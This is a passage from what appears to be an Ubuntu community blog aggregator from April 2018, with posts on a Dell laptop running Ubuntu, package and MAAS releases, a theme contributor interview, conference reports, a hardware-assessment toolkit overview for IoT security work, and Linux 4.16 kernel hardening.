A few things bothered me somewhat though. The placement of the webcam simply does not make sense. It’s at the bottom of the screen, so you get an upwards-angle no matter what you do and people in calls with you will always see a close up of your fingers typing. Small face, huge fingers. It’s really awkward. I won’t go unmanicured into meetings anymore!

The software

It came with an old image of Ubuntu 16.04 LTS pre-installed and after pulling a lot of updates, I thought I was going to get a nice fresh start with everything just working out of the box. Not quite.

The super key was disabled. As 16.04 came with Unity, the super key is one of the key ingredients to starting apps or bringing up the dash. There was a package called supey-key-dell (or some such) installed which I had to find and remove and some gnome config I had to change to make it work again. Why oh why?

Hardware support. I thought this was going to be straight-forward. Unfortunately it wasn’t. In the process of the purchase Dell recommended I get a DA300, a USB-C mobility adapter. That looked like a great suggestion, ensuring I can still use all my Old World devices. Unfortunately the Ethernet port of it just didn’t work with 16.04.

The laptops’s own screen flickered in many circumstances and connecting to screens (even some Dell devices) flickered even more, sometimes screens went on and off.

I got a case with USB-C adapter for the SSD disk of my laptop and copied some data over only to find that some disk I/O load nearly brought the system to a grinding halt.

Palm detection of the touchpad was throwing me off again and again. I can’t count how many times I messed up documents or typed text in the wrong places. This was simply infuriating.

Enter Ubuntu 18.04 LTS

I took the plunge, wiped the disk and made a fresh install of Bionic and I’m not looking back. Palm detection is LOADS better, Disk I/O is better, screen flickering gone, Ethernet port over USB-C works. And I’m using a recent Ubuntu, which is just great! Nice work everyone involved at Ubuntu!

I hope Dell will reconsider shipping this new release to users with recent machines (and as an update) – the experience is dramatically different.

I’m really happy with this machine now, got to go now, got a manicure appointment…

on April 19, 2018 06:55 AM

Today, gksu was removed from Ubuntu 18.04, four weeks after it was removed from Debian.

on April 19, 2018 12:49 AM

April 18, 2018

NGINX has been updated in multiple places.


Ubuntu Bionic 18.04

Ubuntu Bionic 18.04 now has 1.14.0 in the repositories, and very likely will have 1.14.0 for the lifecycle of 18.04 from April of 2018 through April of 2023, as soon as it is released.


NGINX PPAs: Mainline and Stable

There are two major things to note:

First: Ubuntu Trusty 14.04 is no longer supported in the PPAs, and will not receive the updated NGINX versions. This is due to the older versions of libraries in the 14.04 release, which are too old to compile the third-party modules which are included from the Debian packages. Individuals using 14.04 should strongly consider using the nginx.org repositories instead, for newer releases, as they don’t need any libraries which the PPA versions of the packages need.

Secondly: With the exception of Ubuntu Trusty 14.04, the NGINX PPAs are in the process of being updated with NGINX Stable 1.14.0 and NGINX Mainline 1.13.12. Please note that 1.14.0 is equal to 1.13.12 in terms of features, and you should probably use NGINX 1.14.0 instead of 1.13.12 for now. NGINX Mainline will be updated to 1.15.x when NGINX has a ‘new’ Mainline release that is ahead of NGINX Stable.

on April 18, 2018 06:58 PM

Interviewing people behind communitheme. Today: Mads Rosendahl

As discussed last week when unveiling the communitheme snap for ubuntu 18.04 LTS, here is a suite of interview this week on some members of the core contributor team shaping this entirely community-driven theme.

Today is the turn of Mads, madsrh on the community hub.

Who are you? What are you doing/where are you working? Give us some words and background about you!

My name is Mads Rosendahl (MadsRH) and I’m from Denmark. My dayjob has two sides, half the time I work as a teacher at a school of music and the other half I work in PR (no, not pull requests ;) ) where I do things like brochures, ads, website graphics, etc.

I’m no saint - I use OSX, Windows and Linux.

I got involved with Ubuntu back when everything was brown - around 7.10. When I read about Ubuntu, Linux and how Mark Shuttleworth fits into the story, a fire was lit inside me and I wanted to give something back to this brilliant project. In the beginning I set out to make peoples desktops brown and pretty by posting wallpaper suggestions to the artwork mailing list.

Because I can’t write any code, I mostly piggyback on awesome people in the community, like when I worked on the very first slideshow in Ubiquity installer with Dylan McCall.

I attended UDS in Dallas back in 2009 (an amazing experience!) and have had to take a long break from contributing. This theme work is my first contribution since then.

What are you mainly contributor areas on communitheme?

I do mockups, design, find bugs and participate in the conversations. I also suggested new system sounds and have a cursor project in the works - let’s see if it’ll make it into the final release of the theme.

How did you hear about new theming effort on ubuntu, what made you willing to participate actively to it?

I’ve been asking for this for a long time, and suddenly Merlijn suggested a community theme in a comment on a blogpost, so of course I signed up. It’s obvious that the best linux distribution, should have the most beautiful out of the box desktop ;)

How is the interaction with the larger community, how do you deal with different ideas and opinions on the community hub, issues opened against the projects, PR?

There’s an awesome community within Ubuntu and there has been a ton of great feedback and conversations around the decisions. It comes as no surprise that with (almost) every change, there are people both for and against. Luckily we’re not afraid of experimenting. I’m sure that with the final release we’ll have found a good balance between UX (what works best), design (what looks best) and branding (what feels like Ubuntu).

We have a small but awesome team put together back in november when the project was first announced, but we’ve also see a lot of other contributors file issues and step up with PR - fantastic!

It’s easy to see that people are passioned about the Ubuntu desktop.

What did you think (honestly) about the decision for not shipping it by default on 18.04, but curating it for a little while?

It’s the right move. I rest comfortably knowing that Canonical values stability over beauty. Especially when you’ll be able to just install a snap to get the new theme. Rather dusty and stable, than shiny and broken.

Any idea or wish on what the theme name (communitheme is a codename project) should be?

No, but off the top of my head how about: “Dewy” or “Muutos” (Finnish for change)

Any last words or questions I should have asked you?

Nope.

Thanks Mads!

Next interview coming up tomorrow, stay tuned! :)

on April 18, 2018 11:35 AM

Back in February I announced the Call For Papers for the Open Collaboration Conference was open. For those of you in the dark, last year I ran the Open Community Conference as part of the Linux Foundation’s Open Source Summit events in North America and Europe. The events were a great success, but this year we decided to change the name. From the original post:

As the event has evolved, I have wanted it to incorporate as many elements focused on people collaborating together. While one component of this is certainly people building communities, other elements such as governance, remote working, innersource, cultural development, and more fit under the banner of “collaboration”, but don’t necessarily fit under the traditional banner of “community”. As such, we decided to change the name of the conference to the Open Collaboration Conference. I am confident this will then provide both a home to the community strategy and tactics content, as well as these other related areas. This way the entire event services as a comprehensive capsule for collaboration in technology.

I am really excited about this year’s events. They are taking place:

  • North America in Vancouver from 29th – 31st August 2018
  • Europe in Edinburgh from 22nd – 24th October 2018

Last year there was a wealth of tremendous material and truly talented speakers, and I am looking forward to even more focused, valuable, and pragmatic content.

North America Call For Papers Closing Soon

…this neatly leads to the point.

The Call For Papers for the Vancouver event closing on 29th April 2018. So, be sure to go and get your papers in right away.

Also, don’t forget that the European event has the CFP close on the 1st July 2018. Go and submit your papers there too!

For both events I am really looking for a diverse set of content that offers genuine pragmatic value. Example topics include:

  • Open Source Metrics
  • Incentivization and Engagement
  • Software Development Methodologies and Platforms
  • Building Internal Innersource Communities
  • Remote Team Management and Methods
  • Bug/Issue Management and Triage
  • Communication Platforms and Methods
  • Open Source Governance and Models
  • Mentoring and Training
  • Event Strategy
  • Content Management and Social Media
  • DevOps Culture
  • Community Management
  • Advocacy and Evangelism
  • Government and Compliance

Also, here’s a pro tip for helping to get your papers picked.

Many people who submit papers to conferences send in very generic “future of open source” style topics. For the Open Collaboration Conference I am eager to have a few of these, but I am particularly interested in seeing deep dives into specific areas, technologies and approaches. Your submission will be especially well received if it offers pragmatic approaches and value that the audience can immediately take away and apply in their own world. So, consider how you package up your recommendations and best practice and I look forward to seeing you submissions and seeing you there!

The post Open Collaboration Conference (at Open Source Summit) Call For Papers appeared first on Jono Bacon.

on April 18, 2018 04:34 AM

April 17, 2018

MAAS 2.4.0 beta 2 released!

Andres Rodriguez

Hello MAASters!

I’m happy to announce that MAAS 2.4.0 beta 2 is now released and is available for Ubuntu Bionic.
MAAS Availability
MAAS 2.4.0 beta 2 is currently available in Bionic’s Archive or in the following PPA:
ppa:maas/next

MAAS 2.4.0 (beta2)

New Features & Improvements

MAAS Internals optimisation

Continuing with MAAS’ internal surgery, a few more improvements have been made:

  • Backend improvements

  • Improve the image download process, to ensure rack controllers immediately start image download after the region has finished downloading images.

  • Reduce the service monitor interval to 30 seconds. The monitor tracks the status of the various services provided alongside MAAS (DNS, NTP, Proxy).

  • UI Performance optimizations for machines, pods, and zones, including better filtering of node types.

KVM pod improvements

Continuing with the improvements for KVM pods, beta 2 adds the ability to:

  • Define a default storage pool

This feature allows users to select the default storage pool to use when composing machines, in case multiple pools have been defined. Otherwise, MAAS will pick the storage pool automatically depending which pool has the most available space.

  • API – Allow allocating machines with different storage pools

Allows users to request a machine with multiple storage devices from different storage pools. This feature uses storage tags to automatically map a storage pool in libvirt with a storage tag in MAAS.

UI Improvements

  • Remove remaining YUI in favor of AngularJS.

As of beta 2, MAAS has now fully dropped the use of YUI for the Web Interface. The last section using YUI was the Settings page and the login page. Both sections have now been transitioned to use AngularJS instead.

  • Re-organize Settings page

The MAAS settings  have now been reorganized into multiple tabs.

Minor improvements

  • API for default DNS domain selection

Adds the ability to define the default DNS domain. This is currently only available via the API.

  • Vanilla framework upgrade

We would like to thank the Ubuntu web team for their hard work upgrading MAAS to the latest version of the Vanilla framework. MAAS is looking better and more consistent every day!

Bug fixes

Please refer to the following for all 37 bug fixes in this release, which address issues with MAAS across the board:

https://launchpad.net/maas/+milestone/2.4.0beta2

 

on April 17, 2018 05:56 PM

Welcome to the Ubuntu Weekly Newsletter, Issue 523 for the week of April 8 – 14, 2018 – the full version is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Simon Quigley
  • Rozz Welford
  • Elizabeth K. Joseph
  • Bashing-om
  • wildmanne39
  • Krytarik Raido
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on April 17, 2018 03:35 AM

April 16, 2018

The IoT Hacker's Toolkit

David Tomaschik

Today, I’m giving a talk entitled “The IoT Hacker’s Toolkit” at BSides San Francisco. I thought I’d release a companion blog post to go along with the slide deck. I’ll also include a link to the video once it gets posted online.

Introduction

From my talk synopysis:

IoT and embedded devices provide new challenges to security engineers hoping to understand and evaluate the attack surface these devices add. From new interfaces to uncommon operating systems and software, the devices require both skills and tools just a little outside the normal security assessment. I’ll show both the hardware and software tools, where they overlap and what capabilities each tool brings to the table. I’ll also talk about building the skillset and getting the hands-on experience with the tools necessary to perform embedded security assessments.

While some IoT devices can be evaluated from a purely software standpoint (perhaps reverse engineering the mobile application is sufficient for your needs), a lot more can be learned about the device by interacting with all the interfaces available (often including ones not intended for access, such as debug and internal interfaces).

Background

I’ve always had a fascination with both hacking and electronics. I became a radio amateur at age 11, and in college, since my school had no concentration in computer security, I selected an embedded systems concentration. As a hacker, I’ve viewed the growing population of IoT devices with fascination. These devices introduce a variety of new challenges to hackers, including the security engineers tasked with evaluating these devices for security flaws:

  • Unfamiliar architectures (mostly ARM and MIPS)
  • Unusual interfaces (802.15.4, Bluetooth LE, etc.)
  • Minimal software (stripped C programs are common)

Of course, these challenges also present opportunities for hackers (white-hat and black-hat alike) who understand the systems. While finding a memory corruption vulnerability in an enterprise web application is all but unheard of, on an IoT device, it’s not uncommon for web requests to be parsed and served using basic C, with all the memory management issues that entails. In 2016, I found memory corruption vulnerabilities in a popular IP phone.

Think Capabilities, Not Toys

A lot of hackers, myself included, are “gadget guys” (or “gadget girls”). It’s hard not to look at every possible tool as something new to add to the toolbox, but at the end of the day, one has to consider how the tool adds new capabilities. It needn’t be a completely distinct capability, perhaps it offers improved speed or stability.

Of course, this is a “do as I say, not as I do” area. I, in fact, have quite a number of devices with overlapping capabilities. I’d love to claim this was just to compare devices for the benfit of those attending my presentation or reading this post, but honestly, I do love my technical toys.

Software

Much of the software does not differ from that for application security or penetration testing. For example, Wireshark is commonly used for network analysis (IP and Bluetooth), and Burp Suite for HTTP/HTTPS.

The website fccid.io is very useful in reconnaissance of devices, providing information about the frequencies and modulations used, as well as often internal pictures of devices, which can also reveal information such as chipsets, overall architecture, etc., all without lifting a screwdriver.

Reverse Engineering

Firmware images are often multiple files concatentated, or contain proprietary metadata headers. Binwalk walks the image, looking for known file signatures, and extracts the components. Often this will include entire Linux filesystems, kernel images, etc.

Once you have extracted this, you might be interested in analyzing the binaries or other software contained inside. Often a disassembler is useful. My current favorite disassembler is Binary Ninja, but there are a number of options:

Basic Tools

There’s a few tools that I consider absolutely essentially to any sort of hardware hacking exercise. These tools are fundamental to gaining an understanding of the device and accessing multiple types of interfaces on the device.

Screwdriver Set

iFixit Toolkit

A screwdriver set might be an obvious thing, but you’ll want one with bits that can get into tight places, are appropriately sized to the screws on your device (using the wrong size Phillips screwdriver bit is one of the easiest ways to strip a screw). Many devices also use “security screws”, which seems to be a term applied to just about any screw that doesn’t come in your standard household tool kit. (I’ve seen Torx, triangle bits, square bits, Torx with a center pin, etc.)

I have a wonderful driver kit from iFixit, and I’ve found almost nothing that it won’t open. The extension driver helps get into smaller spaces, and the 64 bits cover just about everything. I personally like to support iFixit because they have great write-ups and tear downs, but there are also cheaper clones of this toolkit.

Openers

Openers

Many devices are sealed with plastic catches or pieces that are press-fit together. For these, you’ll need some kind of opener (sometimes called a “spudger”) to pry them apart. I find a variety of shapes useful. You can get this a as part of a combined tool kit from iFixit, iFixit clones, or openers by themselves. I have found the iFixit model to be of slightly higher quality, but I also carry a cheap clone for occassional travel use.

The very thin metal one with a plastic handle is probably my favorite opener – it fits into the thinnest openings, but consequently it also bends fairly easily. I’ve been through a few due to bending damage. Be careful how you use these tools, and make sure your hand is not where they will go if they slip! They are not quite razor-blade sharp, but they will cut your hand with a bit of force behind them.

Multimeter

I get it, you’re looking to hack the device, not rewire your car. That being said, for a lot of tasks, a halfway decent multimeter is somewhere between an absolute requirement and a massive time saver. Some of the tasks a multimeter will help with include:

Multimeter

  • Identifying unknown pinouts
  • Find the ground pin for a UART
  • Checking which components are connected
  • Figuring out what kind of power supply you need
  • Checking the voltage on an interface to make sure you don’t blow something up

I have several multimeters (more than one is important for electronics work), but you can get by with a single one for your IoT hacking projects. The UNI-T UT-61E is a popular model at a good price/performance ratio, but its safety ratings are a little optimistic. The EEVBlog BM235 is my favorite of my meters, but a little higher end (aka expensive). If you’re buying for work, the Fluke 87V is the “golden standard” of multimeters.

If you buy a cheap meter, it will probably work for IoT projects, but there are many multimeters that are unsafe out there. Please do not use these cheap meters on “mains” electricity, high voltage power supplies, anything coming out of the wall, etc. Your personal safety is not worth saving $40.

Soldering Iron

You will find a lot of unpopulated headers (just the holes in the circuit board) on production IoT devices. The headers for various debug interfaces are left out, either as a cost savings, or for space reasons, or perhaps both. The headers were used during the development process, but often the manufacturer wants to leave the connections either to avoid redoing the printed circuit board (PCB) layout, or to be able to debug failures in the field.

In order to connect to these unpopulated headers, you will want to solder your own headers in their place. To do so, you’ll need a soldering iron. To minimize the risk of damaging the board in the process, use a soldering iron with a variable temperature and a small tip. The Hakko FX-888D is very popular and a very nice option, but you can still do good work with something like this Aoyue or other options. Just don’t use a soldering iron designed for a plumber or similiar uses – you’ll just end up burning the board.

Likewise, you’ll want to practice your soldering skills before you start work on your target board – find some small soldering projects to practice on, or some through away scrap electronics to work on.

Network Interfaces

Obviously, these devices have network interfaces. After all, they are the “Internet of Things”, so a network connection would seem to be a requirement. Nearly universally, 802.11 connectivity is present (sometimes on just a base station), and ethernet (10/100 or Gigabit) interfaces are also very common.

Wired Network Sniffing

Ethernet Adapter

The easiest way to sniff a wired network is often a 2nd interface on your computer. I’m a huge fan of this USB 3.0 to Dual Gigabit Adapter, which even has a USB-C version for those using one of the newer laptops or Macbooks that only support USB-C. Either option gives you two network ports to work with, even on laptops without built-in wired interfaces.

Beyond this, you’ll need software for the sniffing. Wireshark is an obvious tool for raw packet capture, but you’ll often also want HTTP/HTTPS sniffing, for which Burp Suite is the defacto standard, but mitmproxy is an up-and-coming contender with a lot of nice features.

Wireless Network Sniffing

Most common wireless network interfaces on laptops can perform monitor mode, but perhaps you’d like to connect your wireless to use the internet, as well as sniff on another interface. Alfa wireless cards like the AWUSO36NH and the AWUSO36ACH have been quite popular for a while, but I personally like using the tiny RT5370-based adapters for assessments not requiring long range due to its compact size and portability.

Wired (Debug/Internal) Interfaces

There are many subtle interfaces on IoT devices, intended for either debug use, or for various components to communicate with each other. For example:

  • SPI/I2C for flash chips
  • SPI/SD for wifi chips
  • UART for serial consoles
  • UART for bluetooth/wifi controllers
  • JTAG/SWD for debugging processors
  • ICSP for In-Circuit Programming

UART

UART Adapter

Though there are many universal devices that can do other things, I run into UARTs so often that I like having a standalone adapter for this. Additionally, having a standalone adapter allows me to maintain a UART connection at the same time as I’m working with JTAG/SWD or other interfaces.

You can get a standalone cable for around $10, that can be used for most UART interfaces. (On most devices I’ve seen, the UART interface is 3.3v, and these cables work well for that.) Most of these cables have the following pinout, but make sure you check your own:

  • Red: +5V (Don’t connect on most boards)
  • Black: GND
  • Green: TX from Computer, RX from Device
  • White: RX from Computer, TX from Device

There are also a number of breakouts for the FT232RL or the CH340 chips for UART to USB. These provide a row of headers to connect jumpers between your target device and the adapter. I prefer the simplicity of the cables (and fewer jumper ends to come loose during my testing), but this is further evidence that there are a number of options to provide the same capabilities.

Universal Interfaces (JTAG/SWD/I2C/SPI)

There are a number of interface boards referred to as “universal interfaces” that have the capability to interface with a wide variety of protocols. These largely fit into two categories:

  • Bit-banging microcontrollers
  • Hardware interfaces (dominated by the FT*232 series from FTDI)

There are a number of options for implementing a bit-banging solution for speaking these protocols, ranging from software projects to run on an Arduino, to projects like the Bus Pirate, which uses a PIC microcontroller. These generally present a serial interface (UART) to the host computer and applications, and use in-band signalling for configuration and settings. There may be some timing issues on certain devices, as microcontrollers often cannot update multiple output pins in the same clock cycle.

FTDI Adapter

Hardware interfaces expose a dedicated USB endpoint to talk to the device, and though this can be configured, it is done via USB endpoints and registers. The protocols are implemented in semi-dedicated hardware. In my experience, these devices are both faster and more reliable than bit-banging microcontrollers, but you are limited to whatever protocols are supported by the particular device, or the capabilities of the software to drive them. (For example, the FT*232H series can do most protocols via bit-banging, but it updates an entire register at a time, and has high enough speed to run the clock rate of many protocols.)

The FT2232H and FT232H (not to be confused with the FT232RL, which is UART only), in particular, has been incorporated into a number of different breakout boards that are excellent universal interfaces:

Logic Analyzer

Logic Analyzer

When you have an unknown protocol, unknown pinout, or unknown protocol settings (baudrate, polarity, parity, etc.), a logic analyzer can dramtically help by allowing you a direct look at the signals being passed between chips or interfaces.

I have a Saleae Logic 8, which is a great value logic analyzer. It has a compact size and their software is really excellent and easy to use. I’ve used it to discover the pinout for many unlabeled ports, discover the settings for UARTs, and just generally snoop on traffic between two chips on a board.

Though there are cheap knock-offs available on eBay or AliExpress, I have tried them and they have very poor quality, and unfortunately the open-source sigrok software is not quite the quality of the Saleae software. Additionally, they rarely have any input protection to prevent you from blowing up the device yourself.

Wireless

Obviously, the Internet of Things has quite a number of wireless devices. Some of these devices use WiFI (discussed above) but many use other wireless protocols. Bluetooth (particularly Bluetooth LE) is quite common, but in other areas, such as home automation, other protocols prevail. Many of these are based on 802.15.4 (Zigbee, Z-Wave) or proprietary protocols in the 433 MHz, 915 MHz, or 2.4 GHz ISM bands.

Bluetooth

Ubertooth One

Bluetooth devices are incredibly common, and Bluetooth Low Energy (starting with Bluetooth 4.0) is very popular for IoT devices. Most devices that do not stream audio, provide IP connectivity, or have other high-bandwidth needs seem to be moving to Bluetooth Low Energy, probably because of several reasons:

  1. Lower power consumption (battery friendly)
  2. Cheaper chipsets
  3. Less complex implementation

There is essentially only one tool I can really recommend for assessing Bluetooth, and that is the Ubertooth One (Amazon). This can follow and capture Bluetooth communications, providing output in pcap or pcap-ng format, allowing you to import the communications into Wireshark for later analysis. (You can also use other pcap-based tools like scapy for analysis of the resulting pcaps.) The Ubertooth tools are available in Debian, Ubuntu, or Kali as packages, but you can get a more up to date version of the software from their Github repository.

Adafruit also offers a BLE Sniffer which works only for Bluetooth Low Energy and utilizes a Nordic Semiconductor BLE chip with a special firmware for sniffing. The software for this works well on Windows, but not so well on Linux where it is a python script that tends to be more difficult to use than the Ubertooth tools.

Software Defined Radio

BladeRF

For custom protocols, or to enable lower-level evaluation or attacks of radio-based systems, Software Defined Radio presents an excellent opportunity for direct interaction with the RF side of the IoT device. This can range from only receiving (for purposes of understanding and reverse engineering the device) to being able to simultaneously receive and transmit (full-duplex) depending upon the needs of your assessment.

For simply receiving, there are simple DVB-T dongles that have been repurposed as general-purpose SDRs, often referred to as “RTL SDRs”, a name based on the Realtek RTL2832U chips present in the device. These can be used because the chip is capable of providing the raw samples to the host operating system, and because of their low cost, a large open source community has emerged. Companies like NooElec are now even offering custom built hardware based on these chips for the SDR community. There’s also a kit that expands the receive range of the RTL-SDR dongles.

In order to transmit as well, the hardware is significantly more complex, and most options in this space are driven by an FPGA or other powerful processor. Even a few years ago, the capabilities here were very expensive with tools like the USRP. However, the HackRF by Great Scott Gadgets and the BladeRF by Nuand have offered a great deal of capability for a hacker-friendly price.

I personally have a BladeRF, but I honestly wish I had bought a HackRF instead. The HackRF has a wider usable frequency range (especially at the low end), while the BladeRF requires a relatively expensive upconverter to cover those bands. The HackRF also seems to have a much more active community and better support in some areas of open source software.

Other Useful Tools

It is occasionally useful to use an oscilloscope to see RF signals or signal integrity, but I have almost never found this necessary.

Specialized JTAG programmers for specific hardware often work better, but cost quite a bit more and are specialized to those specific items.

For dumping Flash chips, Xeltec programmers/dumpers are considered the “top of the line” and do an incredible job, but are at a price point such that only labs doing this on a regular basis find it worthwhile.

Slides

PDF: The IoT Hacker’s Toolkit

on April 16, 2018 07:00 PM
Here is the third issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General Some work was done on the Lubuntu Manual by Lubuntu contributor Lyn Perrine. Here's what she has been working on: Start page for Evince. Start docs for the Document Viewer. Start work on the GNOME […]
on April 16, 2018 04:45 PM

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In March, about 214 work hours have been dispatched among 13 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not change.

The security tracker currently lists 31 packages with a known CVE and the dla-needed.txt file 26. Thanks to a few extra hours dispatched this month (accumulated backlog of a contributor), the number of open issues came back to a more usual value.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

on April 16, 2018 02:07 PM

April 13, 2018

Last month I made my way down to Pasadena for one of my favorite conferences of the year, the Southern California Linux Expo. Like most years, I split my time between Ubuntu and stuff I was working on for my day job. This year that meant doing two talks and attending UbuCon on Thursday and half of Friday.

As with past years, UbuCon at SCALE was hosted by Nathan Haines and Richard Gaskin. The schedule this year was very reflective about the history and changes in the project. In a talk from Sriram Ramkrishna of System76 titled “Unity Dumped Us! The Emotional Healing” he talked about the closing of development on the Unity desktop environment. System76 is primarily a desktop company, so the abrupt change of direction from Canonical took some adjusting to and was a little painful. But out of it came their Ubuntu derivative Pop!_OS and a community around it that they’re quite proud of. In the talk “The Changing Face of Ubuntu” Nathan Haines walked through Ubuntu history to demonstrate the changes that have happened within the project over the years, and allow us to look at the changes today with some historical perspective. The Ubuntu project has always been about change. Jono Bacon was in the final talk slot of the event to give a community management talk titled “Ubuntu: Lessons Learned”. Another retrospective, he drew from his experience when he was the Ubuntu Community Manager to share some insight into what worked and what didn’t in the community. Particularly noteworthy for me were his points about community members needing direction more than options (something I’ve also seen in my work, discrete tasks have a higher chance of being taken than broad contribution requests) and the importance of setting expectations for community members. Indeed, I’ve seen that expectations are frequently poorly communicated in communities where there is a company controlling direction of the project. A lot of frustration could be alleviated by being more clear about what is expected from the company and where the community plays a role.


UbuCon group photo courtesy of Nathan Haines (source)

The UbuCon this year wasn’t as big as those in years past, but we did pack the room with nearly 120 people for a few talks, including the one I did on “Keeping Your Ubuntu Systems Secure”. Nathan Haines suggested this topic when I was struggling to come up with a talk idea for the conference. At first I wasn’t sure what I’d say, but as I started taking notes about what I know about Ubuntu both from a systems administration perspective with servers, and as someone who has done a fair amount of user support in the community over the past decade, it turned out that I did have an entire talk worth of advice! None of what I shared was complicated or revolutionary, there was no kernel hardening in my talk or much use of third party security tools. Instead the talk focused on things like keeping your system updated, developing a fundamental understanding of how your system and Debian packages work, and tips around software management. The slides for my presentation are pretty wordy, so you can glean the tips I shared from them: Keeping_Your_Ubuntu_Systems_Secure-UbuConSummit_Scale16x.pdf.


Thanks to Nathan Haines for taking this photo during my talk (source)

The team running Ubuntu efforts at the conference rounded of SCALE by staffing a booth through the weekend. The Ubuntu booths have certainly evolved over the years, when I ran them it was always a bit cluttered and had quite the grass roots feeling to it (the booth in 2012). The booths the team put together now are simpler and more polished. This is definitely in line with the trend of more polished open source software presence in general, so kudos to the team for making sure our little Ubuntu California crew of volunteers keeps up.

Shifting over to the more work-focused parts of the conference, on Friday I spoke at Container Day, with my talk being the first of the day. The great thing about going first is that I get to complete my talk and relax for the rest of the conference. The less great thing about it is that I get to experience all the A/V gotchas and be awake and ready to give a talk at 9:30AM. Still, I think the pros outweighed the cons and I was able to give a refresh of my “Advanced Continuous Delivery Strategies for Containerized Applications Using DC/OS” talk, which included a new demo that I finished writing the week before. The talk seemed to generate interest that led to good discussions later in the conference, and to my relief the live demo concluded without a problem. Slides from the talk can be found here: Advanced_CD_Using_DCOS-SCALE16x.pdf


Thanks to Nathan Handler for taking this photo during my talk (source)

Saturday and Sunday brought a duo of keynotes that I wouldn’t have expected at an open source conference five years ago, from Microsoft and Amazon. In both these keynotes the speaker recognized the importance of open source today in the industry, which has fueled the shift in perspective and direction regarding open source for these companies. There’s certainly a celebration to be had around this, when companies are contributing to open source because it makes business sense to do so, we all benefit from the increased opportunities that presents. On the other hand, it has caused disruption in the older open source communities, and some have struggled to continue to find personal value and meaning in this new open source world. I’ve been thinking a lot about this since the conference and have started putting together a talk about it, nicely timed for the 20th anniversary of the “open source” term. I want to explore how veteran contributors stay passionate and engaged, and how we can bring this same feeling to new contributors who came down different paths to join open source communities.

Regular talks began on Saturday with me attending Nathan Handler’s talk on “Terraforming all the things” where he shared some of the work they’ve been doing at Yelp that has resulted in the handling of things like DNS records and CDN configuration being handled by Terraform. From there I went to a talk by Brian Proffitt where he talked about metrics in communities and the Community Health Analytics Open Source Software (CHAOOS) project. I spent much of the rest of the day in the “hallway track” catching up with people, but at the end I popped into a talk by Steve Wong on “Running Containerized Workloads in an on-prem Datacenter” where he discussed the role that bare metal continues to have in the industry, even as many rush to the cloud for a turnkey solution.

It was at this talk where I had the pleasure of meeting one of our newest Account Executives at Mesosphere, Kelly Bond, and also had some time to catch up with my colleague Jörg Schad.


Jörg, me, Kelly

Nuritzi Sanchez presented my favorite talk on Sunday, on Endless OS. They build a Linux distribution using FlatPak and as an organization work on the problem of access to technology in developing nations. I’ve long been concerned about cellphone-only access in these countries. You need a mix of a system that’s tolerant to being offline and that has input devices (like keyboards!) that allow work to be done on them. They’re doing really interesting work on the technical side related to offline content and general architecture around a system that needs to be conscious of offline status, but they’re also developing deployment strategies on the ground in places like Indonesia that will ensure the local community can succeed long term. I have a lot of respect for the people working toward all this, and really want to see this organization succeed.

I’m always grateful to participate in this conference. It’s grown a lot over the years and it certainly has changed, but the autonomy given to the special events like UbuCon allows for a conference that brings together lots of different voices and perspective all in one place. I also have a lot of friends who attend this conference, many of whom span jobs and open source projects I’ve worked on over more than a decade. Building friendships and reconnecting with people is part of what makes the work I do in open source so important to me, and not just a job for me. Thanks to everyone who continues to make this possible year after year in beautiful Pasadena.

More photos from the event here: https://www.flickr.com/photos/pleia2/albums/72157693153653781

on April 13, 2018 08:49 PM

I went to Fukushima

Simon Raffeiner

I'm an engineer and interested in all kinds of technology, especially if it is used to build something big. But I'm also fascinated by what happens when things suddenly change and don't go as expected, and especially by everything that's left behind after technological and social revolutions or disasters. In October 2017 I travelled across Japan and decided to visit one of the places where technology had failed in the worst way imaginable: the Fukushima Evacuation Zone.

The post I went to Fukushima appeared first on LIEBERBIBER.

on April 13, 2018 11:36 AM

Previously: v4.15

Linux kernel v4.16 was released last week. I really should write these posts in advance, otherwise I get distracted by the merge window. Regardless, here are some of the security things I think are interesting:

KPTI on arm64

Will Deacon, Catalin Marinas, and several other folks brought Kernel Page Table Isolation (via CONFIG_UNMAP_KERNEL_AT_EL0) to arm64. While most ARMv8+ CPUs were not vulnerable to the primary Meltdown flaw, the Cortex-A75 does need KPTI to be safe from memory content leaks. It’s worth noting, though, that KPTI does protect other ARMv8+ CPU models from having privileged register contents exposed. So, whatever your threat model, it’s very nice to have this clean isolation between kernel and userspace page tables for all ARMv8+ CPUs.

hardened usercopy whitelisting
While whole-object bounds checking was implemented in CONFIG_HARDENED_USERCOPY already, David Windsor and I finished another part of the porting work of grsecurity’s PAX_USERCOPY protection: usercopy whitelisting. This further tightens the scope of slab allocations that can be copied to/from userspace. Now, instead of allowing all objects in slab memory to be copied, only the whitelisted areas (where a subsystem has specifically marked the memory region allowed) can be copied. For example, only the auxv array out of the larger mm_struct.

As mentioned in the first commit from the series, this reduces the scope of slab memory that could be copied out of the kernel in the face of a bug to under 15%. As can be seen, one area of work remaining are the kmalloc regions. Those are regularly used for copying things in and out of userspace, but they’re also used for small simple allocations that aren’t meant to be exposed to userspace. Working to separate these kmalloc users needs some careful auditing.

Total Slab Memory: 48074720 Usercopyable Memory: 6367532 13.2% task_struct 0.2% 4480/1630720 RAW 0.3% 300/96000 RAWv6 2.1% 1408/64768 ext4_inode_cache 3.0% 269760/8740224 dentry 11.1% 585984/5273856 mm_struct 29.1% 54912/188448 kmalloc-8 100.0% 24576/24576 kmalloc-16 100.0% 28672/28672 kmalloc-32 100.0% 81920/81920 kmalloc-192 100.0% 96768/96768 kmalloc-128 100.0% 143360/143360 names_cache 100.0% 163840/163840 kmalloc-64 100.0% 167936/167936 kmalloc-256 100.0% 339968/339968 kmalloc-512 100.0% 350720/350720 kmalloc-96 100.0% 455616/455616 kmalloc-8192 100.0% 655360/655360 kmalloc-1024 100.0% 812032/812032 kmalloc-4096 100.0% 819200/819200 kmalloc-2048 100.0% 1310720/1310720

